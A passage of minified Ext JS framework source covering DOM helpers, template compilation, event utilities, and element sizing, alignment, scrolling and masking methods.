var e, a = "afterbegin", h = "afterend", i = "beforebegin", d = "beforeend", b = /tag|children|cn|html$/i;
function g(m, p, n, q, l, j) {
m = Ext.getDom(m);
var k;
if (e.useDom) {
k = c(p, null);
if (j) {
m.appendChild(k)
} else {
(l == "firstChild" ? m : m.parentNode).insertBefore(k, m[l] || m)
}
} else {
k = Ext.DomHelper.insertHtml(q, m, Ext.DomHelper.createHtml(p))
}
return n ? Ext.get(k, true) : k
}
function c(j, r) {
var k, u = document, p, s, m, t;
if (Ext.isArray(j)) {
k = u.createDocumentFragment();
for (var q = 0, n = j.length; q < n; q++) {
c(j[q], k)
}
} else {
if (typeof j == "string") {
k = u.createTextNode(j)
} else {
k = u.createElement(j.tag || "div");
p = !!k.setAttribute;
for (var s in j) {
if (!b.test(s)) {
m = j[s];
if (s == "cls") {
k.className = m
} else {
if (p) {
k.setAttribute(s, m)
} else {
k[s] = m
}
}
}
}
Ext.DomHelper.applyStyles(k, j.style);
if ((t = j.children || j.cn)) {
c(t, k)
} else {
if (j.html) {
k.innerHTML = j.html
}
}
}
}
if (r) {
r.appendChild(k)
}
return k
}
e = {createTemplate:function (k) {
var j = Ext.DomHelper.createHtml(k);
return new Ext.Template(j)
}, useDom:false, insertBefore:function (j, l, k) {
return g(j, l, k, i)
}, insertAfter:function (j, l, k) {
return g(j, l, k, h, "nextSibling")
}, insertFirst:function (j, l, k) {
return g(j, l, k, a, "firstChild")
}, append:function (j, l, k) {
return g(j, l, k, d, "", true)
}, createDom:c};
return e
}());
Ext.apply(Ext.Template.prototype, {disableFormats:false, re:/\{([\w\-]+)(?:\:([\w\.]*)(?:\((.*?)?\))?)?\}/g, argsRe:/^\s*['"](.*)["']\s*$/, compileARe:/\\/g, compileBRe:/(\r\n|\n)/g, compileCRe:/'/g, applyTemplate:function (b) {
var g = this, a = g.disableFormats !== true, e = Ext.util.Format, c = g;
if (g.compiled) {
return g.compiled(b)
}
function d(j, l, p, k) {
if (p && a) {
if (p.substr(0, 5) == "this.") {
return c.call(p.substr(5), b[l], b)
} else {
if (k) {
var o = g.argsRe;
k = k.split(",");
for (var n = 0, h = k.length; n < h; n++) {
k[n] = k[n].replace(o, "$1")
}
k = [b[l]].concat(k)
} else {
k = [b[l]]
}
return e[p].apply(e, k)
}
} else {
return b[l] !== undefined ? b[l] : ""
}
}
return g.html.replace(g.re, d)
}, compile:function () {
var me = this, fm = Ext.util.Format, useF = me.disableFormats !== true, sep = Ext.isGecko ? "+" : ",", body;
function fn(m, name, format, args) {
if (format && useF) {
args = args ? "," + args : "";
if (format.substr(0, 5) != "this.") {
format = "fm." + format + "("
} else {
format = 'this.call("' + format.substr(5) + '", ';
args = ", values"
}
} else {
args = "";
format = "(values['" + name + "'] == undefined ? '' : "
}
return"'" + sep + format + "values['" + name + "']" + args + ")" + sep + "'"
}
if (Ext.isGecko) {
body = "this.compiled = function(values){ return '" + me.html.replace(me.compileARe, "\\\\").replace(me.compileBRe, "\\n").replace(me.compileCRe, "\\'").replace(me.re, fn) + "';};"
} else {
body = ["this.compiled = function(values){ return ['"];
body.push(me.html.replace(me.compileARe, "\\\\").replace(me.compileBRe, "\\n").replace(me.compileCRe, "\\'").replace(me.re, fn));
body.push("'].join('');};");
body = body.join("")
}
eval(body);
return me
}, call:function (c, b, a) {
return this[c](b, a)
}});
Ext.Template.prototype.apply = Ext.Template.prototype.applyTemplate;
Ext.util.Functions = {createInterceptor:function (c, b, a) {
var d = c;
if (!Ext.isFunction(b)) {
return c
} else {
return function () {
var g = this, e = arguments;
b.target = g;
b.method = c;
return(b.apply(a || g || window, e) !== false) ? c.apply(g || window, e) : null
}
}
}, createDelegate:function (c, d, b, a) {
if (!Ext.isFunction(c)) {
return c
}
return function () {
var g = b || arguments;
if (a === true) {
g = Array.prototype.slice.call(arguments, 0);
g = g.concat(b)
} else {
if (Ext.isNumber(a)) {
g = Array.prototype.slice.call(arguments, 0);
var e = [a, 0].concat(b);
Array.prototype.splice.apply(g, e)
}
}
return c.apply(d || window, g)
}
}, defer:function (d, c, e, b, a) {
d = Ext.util.Functions.createDelegate(d, e, b, a);
if (c > 0) {
return setTimeout(d, c)
}
d();
return 0
}, createSequence:function (c, b, a) {
if (!Ext.isFunction(b)) {
return c
} else {
return function () {
var d = c.apply(this || window, arguments);
b.apply(a || this || window, arguments);
return d
}
}
}};
Ext.defer = Ext.util.Functions.defer;
Ext.createInterceptor = Ext.util.Functions.createInterceptor;
Ext.createSequence = Ext.util.Functions.createSequence;
Ext.createDelegate = Ext.util.Functions.createDelegate;
Ext.apply(Ext.util.Observable.prototype, function () {
function a(j) {
var i = (this.methodEvents = this.methodEvents || {})[j], d, c, g, h = this;
if (!i) {
this.methodEvents[j] = i = {};
i.originalFn = this[j];
i.methodName = j;
i.before = [];
i.after = [];
var b = function (l, k, e) {
if ((c = l.apply(k || h, e)) !== undefined) {
if (typeof c == "object") {
if (c.returnValue !== undefined) {
d = c.returnValue
} else {
d = c
}
g = !!c.cancel
} else {
if (c === false) {
g = true
} else {
d = c
}
}
}
};
this[j] = function () {
var l = Array.prototype.slice.call(arguments, 0), k;
d = c = undefined;
g = false;
for (var m = 0, e = i.before.length; m < e; m++) {
k = i.before[m];
b(k.fn, k.scope, l);
if (g) {
return d
}
}
if ((c = i.originalFn.apply(h, l)) !== undefined) {
d = c
}
for (var m = 0, e = i.after.length; m < e; m++) {
k = i.after[m];
b(k.fn, k.scope, l);
if (g) {
return d
}
}
return d
}
}
return i
}
return{beforeMethod:function (d, c, b) {
a.call(this, d).before.push({fn:c, scope:b})
}, afterMethod:function (d, c, b) {
a.call(this, d).after.push({fn:c, scope:b})
}, removeMethodListener:function (j, g, d) {
var h = this.getMethodEvent(j);
for (var c = 0, b = h.before.length; c < b; c++) {
if (h.before[c].fn == g && h.before[c].scope == d) {
h.before.splice(c, 1);
return
}
}
for (var c = 0, b = h.after.length; c < b; c++) {
if (h.after[c].fn == g && h.after[c].scope == d) {
h.after.splice(c, 1);
return
}
}
}, relayEvents:function (j, e) {
var h = this;
function g(i) {
return function () {
return h.fireEvent.apply(h, [i].concat(Array.prototype.slice.call(arguments, 0)))
}
}
for (var d = 0, b = e.length; d < b; d++) {
var c = e[d];
h.events[c] = h.events[c] || true;
j.on(c, g(c), h)
}
}, enableBubble:function (e) {
var g = this;
if (!Ext.isEmpty(e)) {
e = Ext.isArray(e) ? e : Array.prototype.slice.call(arguments, 0);
for (var d = 0, b = e.length; d < b; d++) {
var c = e[d];
c = c.toLowerCase();
var h = g.events[c] || true;
if (typeof h == "boolean") {
h = new Ext.util.Event(g, c);
g.events[c] = h
}
h.bubble = true
}
}
}}
}());
Ext.util.Observable.capture = function (c, b, a) {
c.fireEvent = c.fireEvent.createInterceptor(b, a)
};
Ext.util.Observable.observeClass = function (b, a) {
if (b) {
if (!b.fireEvent) {
Ext.apply(b, new Ext.util.Observable());
Ext.util.Observable.capture(b.prototype, b.fireEvent, b)
}
if (typeof a == "object") {
b.on(a)
}
return b
}
};
Ext.apply(Ext.EventManager, function () {
var d, k, g, b, a = Ext.lib.Dom, j = /^(?:scope|delay|buffer|single|stopEvent|preventDefault|stopPropagation|normalized|args|delegate)$/, c = Ext.EventManager._unload, i = 0, h = 0, e = Ext.isWebKit ? Ext.num(navigator.userAgent.match(/AppleWebKit\/(\d+)/)[1]) >= 525 : !((Ext.isGecko && !Ext.isWindows) || Ext.isOpera);
return{_unload:function () {
Ext.EventManager.un(window, "resize", this.fireWindowResize, this);
c.call(Ext.EventManager)
}, doResizeEvent:function () {
var m = a.getViewHeight(), l = a.getViewWidth();
if (h != m || i != l) {
d.fire(i = l, h = m)
}
}, onWindowResize:function (n, m, l) {
if (!d) {
d = new Ext.util.Event();
k = new Ext.util.DelayedTask(this.doResizeEvent);
Ext.EventManager.on(window, "resize", this.fireWindowResize, this)
}
d.addListener(n, m, l)
}, fireWindowResize:function () {
if (d) {
k.delay(100)
}
}, onTextResize:function (o, n, l) {
if (!g) {
g = new Ext.util.Event();
var m = new Ext.Element(document.createElement("div"));
m.dom.className = "x-text-resize";
m.dom.innerHTML = "X";
m.appendTo(document.body);
b = m.dom.offsetHeight;
setInterval(function () {
if (m.dom.offsetHeight != b) {
g.fire(b, b = m.dom.offsetHeight)
}
}, this.textResizeInterval)
}
g.addListener(o, n, l)
}, removeResizeListener:function (m, l) {
if (d) {
d.removeListener(m, l)
}
}, fireResize:function () {
if (d) {
d.fire(a.getViewWidth(), a.getViewHeight())
}
}, textResizeInterval:50, ieDeferSrc:false, getKeyEvent:function () {
return e ? "keydown" : "keypress"
}, useKeydown:e}
}());
Ext.EventManager.on = Ext.EventManager.addListener;
Ext.apply(Ext.EventObjectImpl.prototype, {BACKSPACE:8, TAB:9, NUM_CENTER:12, ENTER:13, RETURN:13, SHIFT:16, CTRL:17, CONTROL:17, ALT:18, PAUSE:19, CAPS_LOCK:20, ESC:27, SPACE:32, PAGE_UP:33, PAGEUP:33, PAGE_DOWN:34, PAGEDOWN:34, END:35, HOME:36, LEFT:37, UP:38, RIGHT:39, DOWN:40, PRINT_SCREEN:44, INSERT:45, DELETE:46, ZERO:48, ONE:49, TWO:50, THREE:51, FOUR:52, FIVE:53, SIX:54, SEVEN:55, EIGHT:56, NINE:57, A:65, B:66, C:67, D:68, E:69, F:70, G:71, H:72, I:73, J:74, K:75, L:76, M:77, N:78, O:79, P:80, Q:81, R:82, S:83, T:84, U:85, V:86, W:87, X:88, Y:89, Z:90, CONTEXT_MENU:93, NUM_ZERO:96, NUM_ONE:97, NUM_TWO:98, NUM_THREE:99, NUM_FOUR:100, NUM_FIVE:101, NUM_SIX:102, NUM_SEVEN:103, NUM_EIGHT:104, NUM_NINE:105, NUM_MULTIPLY:106, NUM_PLUS:107, NUM_MINUS:109, NUM_PERIOD:110, NUM_DIVISION:111, F1:112, F2:113, F3:114, F4:115, F5:116, F6:117, F7:118, F8:119, F9:120, F10:121, F11:122, F12:123, isNavKeyPress:function () {
var b = this, a = this.normalizeKey(b.keyCode);
return(a >= 33 && a <= 40) || a == b.RETURN || a == b.TAB || a == b.ESC
}, isSpecialKey:function () {
var a = this.normalizeKey(this.keyCode);
return(this.type == "keypress" && this.ctrlKey) || this.isNavKeyPress() || (a == this.BACKSPACE) || (a >= 16 && a <= 20) || (a >= 44 && a <= 46)
}, getPoint:function () {
return new Ext.lib.Point(this.xy[0], this.xy[1])
}, hasModifier:function () {
return((this.ctrlKey || this.altKey) || this.shiftKey)
}});
Ext.Element.addMethods({swallowEvent:function (a, b) {
var d = this;
function c(g) {
g.stopPropagation();
if (b) {
g.preventDefault()
}
}
if (Ext.isArray(a)) {
Ext.each(a, function (g) {
d.on(g, c)
});
return d
}
d.on(a, c);
return d
}, relayEvent:function (a, b) {
this.on(a, function (c) {
b.fireEvent(a, c)
})
}, clean:function (b) {
var d = this, e = d.dom, g = e.firstChild, c = -1;
if (Ext.Element.data(e, "isCleaned") && b !== true) {
return d
}
while (g) {
var a = g.nextSibling;
if (g.nodeType == 3 && !(/\S/.test(g.nodeValue))) {
e.removeChild(g)
} else {
g.nodeIndex = ++c
}
g = a
}
Ext.Element.data(e, "isCleaned", true);
return d
}, load:function () {
var a = this.getUpdater();
a.update.apply(a, arguments);
return this
}, getUpdater:function () {
return this.updateManager || (this.updateManager = new Ext.Updater(this))
}, update:function (html, loadScripts, callback) {
if (!this.dom) {
return this
}
html = html || "";
if (loadScripts !== true) {
this.dom.innerHTML = html;
if (typeof callback == "function") {
callback()
}
return this
}
var id = Ext.id(), dom = this.dom;
html += '<span id="' + id + '"></span>';
Ext.lib.Event.onAvailable(id, function () {
var DOC = document, hd = DOC.getElementsByTagName("head")[0], re = /(?:<script([^>]*)?>)((\n|\r|.)*?)(?:<\/script>)/ig, srcRe = /\ssrc=([\'\"])(.*?)\1/i, typeRe = /\stype=([\'\"])(.*?)\1/i, match, attrs, srcMatch, typeMatch, el, s;
while ((match = re.exec(html))) {
attrs = match[1];
srcMatch = attrs ? attrs.match(srcRe) : false;
if (srcMatch && srcMatch[2]) {
s = DOC.createElement("script");
s.src = srcMatch[2];
typeMatch = attrs.match(typeRe);
if (typeMatch && typeMatch[2]) {
s.type = typeMatch[2]
}
hd.appendChild(s)
} else {
if (match[2] && match[2].length > 0) {
if (window.execScript) {
window.execScript(match[2])
} else {
window.eval(match[2])
}
}
}
}
el = DOC.getElementById(id);
if (el) {
Ext.removeNode(el)
}
if (typeof callback == "function") {
callback()
}
});
dom.innerHTML = html.replace(/(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig, "");
return this
}, removeAllListeners:function () {
this.removeAnchor();
Ext.EventManager.removeAll(this.dom);
return this
}, createProxy:function (a, e, d) {
a = (typeof a == "object") ? a : {tag:"div", cls:a};
var c = this, b = e ? Ext.DomHelper.append(e, a, true) : Ext.DomHelper.insertBefore(c.dom, a, true);
if (d && c.setBox && c.getBox) {
b.setBox(c.getBox())
}
return b
}});
Ext.Element.prototype.getUpdateManager = Ext.Element.prototype.getUpdater;
Ext.Element.addMethods({getAnchorXY:function (e, l, q) {
e = (e || "tl").toLowerCase();
q = q || {};
var k = this, b = k.dom == document.body || k.dom == document, n = q.width || b ? Ext.lib.Dom.getViewWidth() : k.getWidth(), i = q.height || b ? Ext.lib.Dom.getViewHeight() : k.getHeight(), p, a = Math.round, c = k.getXY(), m = k.getScroll(), j = b ? m.left : !l ? c[0] : 0, g = b ? m.top : !l ? c[1] : 0, d = {c:[a(n * 0.5), a(i * 0.5)], t:[a(n * 0.5), 0], l:[0, a(i * 0.5)], r:[n, a(i * 0.5)], b:[a(n * 0.5), i], tl:[0, 0], bl:[0, i], br:[n, i], tr:[n, 0]};
p = d[e];
return[p[0] + j, p[1] + g]
}, anchorTo:function (b, h, c, a, k, l) {
var i = this, e = i.dom, j = !Ext.isEmpty(k), d = function () {
Ext.fly(e).alignTo(b, h, c, a);
Ext.callback(l, Ext.fly(e))
}, g = this.getAnchor();
this.removeAnchor();
Ext.apply(g, {fn:d, scroll:j});
Ext.EventManager.onWindowResize(d, null);
if (j) {
Ext.EventManager.on(window, "scroll", d, null, {buffer:!isNaN(k) ? k : 50})
}
d.call(i);
return i
}, removeAnchor:function () {
var b = this, a = this.getAnchor();
if (a && a.fn) {
Ext.EventManager.removeResizeListener(a.fn);
if (a.scroll) {
Ext.EventManager.un(window, "scroll", a.fn)
}
delete a.fn
}
return b
}, getAnchor:function () {
var b = Ext.Element.data, c = this.dom;
if (!c) {
return
}
var a = b(c, "_anchor");
if (!a) {
a = b(c, "_anchor", {})
}
return a
}, getAlignToXY:function (g, A, B) {
g = Ext.get(g);
if (!g || !g.dom) {
throw"Element.alignToXY with an element that doesn't exist"
}
B = B || [0, 0];
A = (!A || A == "?" ? "tl-bl?" : (!(/-/).test(A) && A !== "" ? "tl-" + A : A || "tl-bl")).toLowerCase();
var K = this, H = K.dom, M, L, n, l, s, F, v, t = Ext.lib.Dom.getViewWidth() - 10, G = Ext.lib.Dom.getViewHeight() - 10, b, i, j, k, u, z, N = document, J = N.documentElement, q = N.body, E = (J.scrollLeft || q.scrollLeft || 0) + 5, D = (J.scrollTop || q.scrollTop || 0) + 5, I = false, e = "", a = "", C = A.match(/^([a-z]+)-([a-z]+)(\?)?$/);
if (!C) {
throw"Element.alignTo with an invalid alignment " + A
}
e = C[1];
a = C[2];
I = !!C[3];
M = K.getAnchorXY(e, true);
L = g.getAnchorXY(a, false);
n = L[0] - M[0] + B[0];
l = L[1] - M[1] + B[1];
if (I) {
s = K.getWidth();
F = K.getHeight();
v = g.getRegion();
b = e.charAt(0);
i = e.charAt(e.length - 1);
j = a.charAt(0);
k = a.charAt(a.length - 1);
u = ((b == "t" && j == "b") || (b == "b" && j == "t"));
z = ((i == "r" && k == "l") || (i == "l" && k == "r"));
if (n + s > t + E) {
n = z ? v.left - s : t + E - s
}
if (n < E) {
n = z ? v.right : E
}
if (l + F > G + D) {
l = u ? v.top - F : G + D - F
}
if (l < D) {
l = u ? v.bottom : D
}
}
return[n, l]
}, alignTo:function (c, a, e, b) {
var d = this;
return d.setXY(d.getAlignToXY(c, a, e), d.preanim && !!b ? d.preanim(arguments, 3) : false)
}, adjustForConstraints:function (c, a, b) {
return this.getConstrainToXY(a || document, false, b, c) || c
}, getConstrainToXY:function (b, a, c, e) {
var d = {top:0, left:0, bottom:0, right:0};
return function (i, A, l, n) {
i = Ext.get(i);
l = l ? Ext.applyIf(l, d) : d;
var z, D, v = 0, u = 0;
if (i.dom == document.body || i.dom == document) {
z = Ext.lib.Dom.getViewWidth();
D = Ext.lib.Dom.getViewHeight()
} else {
z = i.dom.clientWidth;
D = i.dom.clientHeight;
if (!A) {
var t = i.getXY();
v = t[0];
u = t[1]
}
}
var r = i.getScroll();
v += l.left + r.left;
u += l.top + r.top;
z -= l.right;
D -= l.bottom;
var B = v + z, g = u + D, j = n || (!A ? this.getXY() : [this.getLeft(true), this.getTop(true)]), p = j[0], o = j[1], k = this.getConstrainOffset(), q = this.dom.offsetWidth + k, C = this.dom.offsetHeight + k;
var m = false;
if ((p + q) > B) {
p = B - q;
m = true
}
if ((o + C) > g) {
o = g - C;
m = true
}
if (p < v) {
p = v;
m = true
}
if (o < u) {
o = u;
m = true
}
return m ? [p, o] : false
}
}(), getConstrainOffset:function () {
return 0
}, getCenterXY:function () {
return this.getAlignToXY(document, "c-c")
}, center:function (a) {
return this.alignTo(a || document, "c-c")
}});
Ext.Element.addMethods({select:function (a, b) {
return Ext.Element.select(a, b, this.dom)
}});
Ext.apply(Ext.Element.prototype, function () {
var c = Ext.getDom, a = Ext.get, b = Ext.DomHelper;
return{insertSibling:function (i, g, h) {
var j = this, e, d = (g || "before").toLowerCase() == "after", k;
if (Ext.isArray(i)) {
k = j;
Ext.each(i, function (l) {
e = Ext.fly(k, "_internal").insertSibling(l, g, h);
if (d) {
k = e
}
});
return e
}
i = i || {};
if (i.nodeType || i.dom) {
e = j.dom.parentNode.insertBefore(c(i), d ? j.dom.nextSibling : j.dom);
if (!h) {
e = a(e)
}
} else {
if (d && !j.dom.nextSibling) {
e = b.append(j.dom.parentNode, i, !h)
} else {
e = b[d ? "insertAfter" : "insertBefore"](j.dom, i, !h)
}
}
return e
}}
}());
Ext.Element.boxMarkup = '<div class="{0}-tl"><div class="{0}-tr"><div class="{0}-tc"></div></div></div><div class="{0}-ml"><div class="{0}-mr"><div class="{0}-mc"></div></div></div><div class="{0}-bl"><div class="{0}-br"><div class="{0}-bc"></div></div></div>';
Ext.Element.addMethods(function () {
var a = "_internal", b = /(\d+\.?\d+)px/;
return{applyStyles:function (c) {
Ext.DomHelper.applyStyles(this.dom, c);
return this
}, getStyles:function () {
var c = {};
Ext.each(arguments, function (d) {
c[d] = this.getStyle(d)
}, this);
return c
}, setOverflow:function (c) {
var d = this.dom;
if (c == "auto" && Ext.isMac && Ext.isGecko2) {
d.style.overflow = "hidden";
(function () {
d.style.overflow = "auto"
}).defer(1)
} else {
d.style.overflow = c
}
}, boxWrap:function (c) {
c = c || "x-box";
var d = Ext.get(this.insertHtml("beforeBegin", "<div class='" + c + "'>" + String.format(Ext.Element.boxMarkup, c) + "</div>"));
Ext.DomQuery.selectNode("." + c + "-mc", d.dom).appendChild(this.dom);
return d
}, setSize:function (e, c, d) {
var g = this;
if (typeof e == "object") {
c = e.height;
e = e.width
}
e = g.adjustWidth(e);
c = g.adjustHeight(c);
if (!d || !g.anim) {
g.dom.style.width = g.addUnits(e);
g.dom.style.height = g.addUnits(c)
} else {
g.anim({width:{to:e}, height:{to:c}}, g.preanim(arguments, 2))
}
return g
}, getComputedHeight:function () {
var d = this, c = Math.max(d.dom.offsetHeight, d.dom.clientHeight);
if (!c) {
c = parseFloat(d.getStyle("height")) || 0;
if (!d.isBorderBox()) {
c += d.getFrameWidth("tb")
}
}
return c
}, getComputedWidth:function () {
var c = Math.max(this.dom.offsetWidth, this.dom.clientWidth);
if (!c) {
c = parseFloat(this.getStyle("width")) || 0;
if (!this.isBorderBox()) {
c += this.getFrameWidth("lr")
}
}
return c
}, getFrameWidth:function (d, c) {
return c && this.isBorderBox() ? 0 : (this.getPadding(d) + this.getBorderWidth(d))
}, addClassOnOver:function (c) {
this.hover(function () {
Ext.fly(this, a).addClass(c)
}, function () {
Ext.fly(this, a).removeClass(c)
});
return this
}, addClassOnFocus:function (c) {
this.on("focus", function () {
Ext.fly(this, a).addClass(c)
}, this.dom);
this.on("blur", function () {
Ext.fly(this, a).removeClass(c)
}, this.dom);
return this
}, addClassOnClick:function (c) {
var d = this.dom;
this.on("mousedown", function () {
Ext.fly(d, a).addClass(c);
var g = Ext.getDoc(), e = function () {
Ext.fly(d, a).removeClass(c);
g.removeListener("mouseup", e)
};
g.on("mouseup", e)
});
return this
}, getViewSize:function () {
var g = document, h = this.dom, c = (h == g || h == g.body);
if (c) {
var e = Ext.lib.Dom;
return{width:e.getViewWidth(), height:e.getViewHeight()}
} else {
return{width:h.clientWidth, height:h.clientHeight}
}
}, getStyleSize:function () {
var j = this, c, i, l = document, m = this.dom, e = (m == l || m == l.body), g = m.style;
if (e) {
var k = Ext.lib.Dom;
return{width:k.getViewWidth(), height:k.getViewHeight()}
}
if (g.width && g.width != "auto") {
c = parseFloat(g.width);
if (j.isBorderBox()) {
c -= j.getFrameWidth("lr")
}
}
if (g.height && g.height != "auto") {
i = parseFloat(g.height);
if (j.isBorderBox()) {
i -= j.getFrameWidth("tb")
}
}
return{width:c || j.getWidth(true), height:i || j.getHeight(true)}
}, getSize:function (c) {
return{width:this.getWidth(c), height:this.getHeight(c)}
}, repaint:function () {
var c = this.dom;
this.addClass("x-repaint");
setTimeout(function () {
Ext.fly(c).removeClass("x-repaint")
}, 1);
return this
}, unselectable:function () {
this.dom.unselectable = "on";
return this.swallowEvent("selectstart", true).applyStyles("-moz-user-select:none;-khtml-user-select:none;").addClass("x-unselectable")
}, getMargins:function (d) {
var e = this, c, g = {t:"top", l:"left", r:"right", b:"bottom"}, h = {};
if (!d) {
for (c in e.margins) {
h[g[c]] = parseFloat(e.getStyle(e.margins[c])) || 0
}
return h
} else {
return e.addStyles.call(e, d, e.margins)
}
}}
}());
Ext.Element.addMethods({setBox:function (e, g, b) {
var d = this, a = e.width, c = e.height;
if ((g && !d.autoBoxAdjust) && !d.isBorderBox()) {
a -= (d.getBorderWidth("lr") + d.getPadding("lr"));
c -= (d.getBorderWidth("tb") + d.getPadding("tb"))
}
d.setBounds(e.x, e.y, a, c, d.animTest.call(d, arguments, b, 2));
return d
}, getBox:function (j, p) {
var m = this, v, e, o, d = m.getBorderWidth, q = m.getPadding, g, a, u, n;
if (!p) {
v = m.getXY()
} else {
e = parseInt(m.getStyle("left"), 10) || 0;
o = parseInt(m.getStyle("top"), 10) || 0;
v = [e, o]
}
var c = m.dom, s = c.offsetWidth, i = c.offsetHeight, k;
if (!j) {
k = {x:v[0], y:v[1], 0:v[0], 1:v[1], width:s, height:i}
} else {
g = d.call(m, "l") + q.call(m, "l");
a = d.call(m, "r") + q.call(m, "r");
u = d.call(m, "t") + q.call(m, "t");
n = d.call(m, "b") + q.call(m, "b");
k = {x:v[0] + g, y:v[1] + u, 0:v[0] + g, 1:v[1] + u, width:s - (g + a), height:i - (u + n)}
}
k.right = k.x + k.width;
k.bottom = k.y + k.height;
return k
}, move:function (j, b, c) {
var g = this, m = g.getXY(), k = m[0], i = m[1], d = [k - b, i], l = [k + b, i], h = [k, i - b], a = [k, i + b], e = {l:d, left:d, r:l, right:l, t:h, top:h, up:h, b:a, bottom:a, down:a};
j = j.toLowerCase();
g.moveTo(e[j][0], e[j][1], g.animTest.call(g, arguments, c, 2))
}, setLeftTop:function (d, c) {
var b = this, a = b.dom.style;
a.left = b.addUnits(d);
a.top = b.addUnits(c);
return b
}, getRegion:function () {
return Ext.lib.Dom.getRegion(this.dom)
}, setBounds:function (b, g, d, a, c) {
var e = this;
if (!c || !e.anim) {
e.setSize(d, a);
e.setLocation(b, g)
} else {
e.anim({points:{to:[b, g]}, width:{to:e.adjustWidth(d)}, height:{to:e.adjustHeight(a)}}, e.preanim(arguments, 4), "motion")
}
return e
}, setRegion:function (b, a) {
return this.setBounds(b.left, b.top, b.right - b.left, b.bottom - b.top, this.animTest.call(this, arguments, a, 1))
}});
Ext.Element.addMethods({scrollTo:function (b, d, a) {
var e = /top/i.test(b), c = this, g = c.dom, h;
if (!a || !c.anim) {
h = "scroll" + (e ? "Top" : "Left");
g[h] = d
} else {
h = "scroll" + (e ? "Left" : "Top");
c.anim({scroll:{to:e ? [g[h], d] : [d, g[h]]}}, c.preanim(arguments, 2), "scroll")
}
return c
}, scrollIntoView:function (e, i) {
var p = Ext.getDom(e) || Ext.getBody().dom, h = this.dom, g = this.getOffsetsTo(p), k = g[0] + p.scrollLeft, u = g[1] + p.scrollTop, q = u + h.offsetHeight, d = k + h.offsetWidth, a = p.clientHeight, m = parseInt(p.scrollTop, 10), s = parseInt(p.scrollLeft, 10), j = m + a, n = s + p.clientWidth;
if (h.offsetHeight > a || u < m) {
p.scrollTop = u
} else {
if (q > j) {
p.scrollTop = q - a
}
}
p.scrollTop = p.scrollTop;
if (i !== false) {
if (h.offsetWidth > p.clientWidth || k < s) {
p.scrollLeft = k
} else {
if (d > n) {
p.scrollLeft = d - p.clientWidth
}
}
p.scrollLeft = p.scrollLeft
}
return this
}, scrollChildIntoView:function (b, a) {
Ext.fly(b, "_scrollChildIntoView").scrollIntoView(this, a)
}, scroll:function (m, b, d) {
if (!this.isScrollable()) {
return false
}
var e = this.dom, g = e.scrollLeft, p = e.scrollTop, n = e.scrollWidth, k = e.scrollHeight, i = e.clientWidth, a = e.clientHeight, c = false, o, j = {l:Math.min(g + b, n - i), r:o = Math.max(g - b, 0), t:Math.max(p - b, 0), b:Math.min(p + b, k - a)};
j.d = j.b;
j.u = j.t;
m = m.substr(0, 1);
if ((o = j[m]) > -1) {
c = true;
this.scrollTo(m == "l" || m == "r" ? "left" : "top", o, this.preanim(arguments, 2))
}
return c
}});
Ext.Element.addMethods(function () {
var d = "visibility", b = "display", a = "hidden", h = "none", c = "x-masked", g = "x-masked-relative", e = Ext.Element.data;
return{isVisible:function (i) {
var j = !this.isStyle(d, a) && !this.isStyle(b, h), k = this.dom.parentNode;
if (i !== true || !j) {
return j
}
while (k && !(/^body/i.test(k.tagName))) {
if (!Ext.fly(k, "_isVisible").isVisible()) {
return false
}
k = k.parentNode
}
return true
}, isDisplayed:function () {
return !this.isStyle(b, h)
}, enableDisplayMode:function (i) {
this.setVisibilityMode(Ext.Element.DISPLAY);
if (!Ext.isEmpty(i)) {
e(this.dom, "originalDisplay", i)
}
return this
}, mask:function (j, n) {
var p = this, l = p.dom, o = Ext.DomHelper, m = "ext-el-mask-msg", i, q;
if (!/^body/i.test(l.tagName) && p.getStyle("position") == "static") {
p.addClass(g)
}
if (i = e(l, "maskMsg")) {
i.remove()
}
if (i = e(l, "mask")) {
i.remove()
}
q = o.append(l, {cls:"ext-el-mask"}, true);
e(l, "mask", q);
p.addClass(c);
q.setDisplayed(true);
if (typeof j == "string") {
var k = o.append(l, {cls:m, cn:{tag:"div"}}, true);
e(l, "maskMsg", k);
k.dom.className = n ? m + " " + n : m;
k.dom.firstChild.innerHTML = j;
k.setDisplayed(true);
k.center(p)
}
if (Ext.isIE && !(Ext.isIE7 && Ext.isStrict) && p.getStyle("height") == "auto") {
q.setSize(undefined, p.getHeight())
}
return q
}, unmask:function () {
var k = this, l = k.dom, i = e(l, "mask"), j = e(l, "maskMsg");
if (i) {
if (j) {
j.remove();
e(l, "maskMsg", undefined)
}
i.remove();
e(l, "mask", undefined);
k.removeClass([c, g])
}
}, isMasked:function () {
var i = e(this.dom, "mask");
return i && i.isVisible()
}, createShim:function () {
var i = document.createElement("iframe"), j;
i.frameBorder = "0";
i.className = "ext-shim";
i.src = Ext.SSL_SECURE_URL;
j = Ext.get(this.dom.parentNode.insertBefore(i, this.dom));
j.autoBoxAdjust = false;
return j
}}
}());
Ext.Element.addMethods({addKeyListener:function (b, d, c) {
var a;
if (typeof b != "object" || Ext.isArray(b)) {
a = {key:b, fn:d, scope:c}
} else {
a = {key:b.key, shift:b.shift, ctrl:b.ctrl, alt:b.alt, fn:d, scope:c}
}
return new Ext.KeyMap(this, a)
}, addKeyMap:function (a) {
return new Ext.KeyMap(this, a)
}});
Ext.CompositeElementLite.importElementMethods();
Ext.apply(Ext.CompositeElementLite.prototype, {addElements:function (c, a) {
if (!c) {
return this
}
if (typeof c == "string") {
c = Ext.Element.selectorFunction(c, a)
}
var b = this.elements;
Ext.each(c, function (d) {
b.push(Ext.get(d))
});
return this
}, first:function () {
return this.item(0)
}, last:function () {
return this.item(this.getCount() - 1)
}, contains:function (a) {
return this.indexOf(a) != -1
}, removeElement:function (d, e) {
var c = this, a = this.elements, b;
Ext.each(d, function (g) {
if ((b = (a[g] || a[g = c.indexOf(g)]))) {
if (e) {
if (b.dom) {
b.remove()
} else {
Ext.removeNode(b)
}
}
a.splice(g, 1)
}
});
return this
}});
Ext.CompositeElement = Ext.extend(Ext.CompositeElementLite, {constructor:function (b, a) {
this.elements = [];
this.add(b, a)
}, getElement:function (a) {
return a
}, transformElement:function (a) {
return Ext.get(a)
}});
Ext.Element.select = function (a, d, b) {
var c;
if (typeof a == "string") {
c = Ext.Element.selectorFunction(a, b)
} else {
if (a.length !== undefined) {
c = a
} else {
throw"Invalid selector"
}
}
return(d === true) ? new Ext.CompositeElement(c) : new Ext.CompositeElementLite(c)
};
Ext.select = Ext.Element.select;
Ext.UpdateManager = Ext.Updater = Ext.extend(Ext.util.Observable, function () {
var b = "beforeupdate", d = "update", c = "failure";
function a(h) {
var i = this;
